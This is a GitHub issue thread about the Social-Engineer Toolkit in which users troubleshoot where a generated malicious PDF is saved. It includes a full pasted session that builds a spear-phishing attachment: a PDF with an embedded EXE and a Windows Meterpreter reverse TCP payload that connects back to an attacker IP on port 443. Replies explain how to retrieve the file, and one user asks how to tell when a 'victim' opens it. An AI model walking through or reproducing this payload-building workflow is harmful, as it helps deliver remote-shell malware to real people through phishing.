Closed DuStyGSY closed 8 years ago
Under the option to keep the filename or rename the file name why did you specify set:phishing>test.pdf instead of the option 1 or 2?
The file is stored under /root/.set/.
root@stronghold:~# ls -al /root/.set/ total 80 drwxr-xr-x 2 root root 4096 Apr 20 11:27 . drwx------ 38 root root 4096 Apr 4 22:39 .. -rw-r--r-- 1 root root 47 Apr 20 11:27 payload.options -rw-r--r-- 1 root root 70 Apr 20 11:24 set.options -rw-r--r-- 1 root root 60539 Apr 20 11:27 template.pdf -rw-r--r-- 1 root root 228 Apr 20 11:27 template.rc
Hi thanks for the reply.
I just realised what I did there and ran back through the options. Thats why I couldn't see my pdf file because I hadn't selected 2.
Cheers for your reply all sorted now.
if I'm close the terminal and want to use the file again or any victim open the file after few days how can I check that???
set:payloads> Port to connect back on [443]: 1337 [!] Metasploit has not been previously run on the system. This means that the msf directories haven't been created yet. Running Metasploit for you. [*] Waiting 10 seconds for the directories to be created... [!] Please exit out of SET and type 'msfconsole' from the command prompt and launch SET again. Can't find the msf4 directory.
How to fix
Hi, how do i get the .pdf out of there? i cant lol
Hi, how do i get the .pdf out of there? i cant lol
su -
then locate to the /root/.set/
cd /root/.set/
then copy it to somewhere in your user folder, in this case i'm going with the downloads folder and my username is "anar"
mv <filename>.pdf /home/anar/Downloads
where
Thanks!
yep thx very much for the quick tuto!
Merci!
hey do you wanted to work in collaboration with me?
Yes of course
On Sat, Feb 4, 2023, 8:15 AM bypasssss @.***> wrote:
Merci!
hey do you wanted to work in collaboration with me?
— Reply to this email directly, view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1416472330, or unsubscribe https://github.com/notifications/unsubscribe-auth/A4727SSLCGMPKBJZNLIQOPLWVV7P5ANCNFSM4CBPGRZQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>
hello I have a problem, Idont know wher my pdf payloads are, Im trying to find the template.whatever file
Does this works with android?
hello I have a problem, Idont know wher my pdf payloads are, Im trying to find the template.whatever file
https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1364383440
Does this works with android?
i hope so although I haven't tried on android
hey Barri
Le lun. 19 juin 2023 à 14:41, Mansoor Barri @.***> a écrit :
Does this works with android?
i hope so although I haven't tried on android
— Reply to this email directly, view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1597118365, or unsubscribe https://github.com/notifications/unsubscribe-auth/A5VEDJIF24XJK5LEP6GDBSTXMBCGBANCNFSM4CBPGRZQ . You are receiving this because you commented.Message ID: @.***>
I have just downloaded and installed SET as the one that comes with kali keeps talking about bleeding edge repositories. As you can see I am using Version 7.0.6 and still this problem persists.
Here is my output;
---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Version: 7.0.6 [---] [---] Codename: 'RemembRance' [---] [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---]
The Social-Engineer Toolkit is a product of TrustedSec.
Select from the menu:
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules
99) Return back to the main menu.
set> 1
The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!
1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>2
Select the file format exploit you want. The default is the PDF embedded EXE.
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>13
[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
set:payloads>2
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 192.168.21.105 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Payload creation complete. [] All payloads get sent to the template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
set:phishing>test.pdf
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.
What do you want to do:
set:phishing>99
Thank you for shopping with the Social-Engineer Toolkit.
Hack the Gibson...and remember...hugs are worth more than handshakes.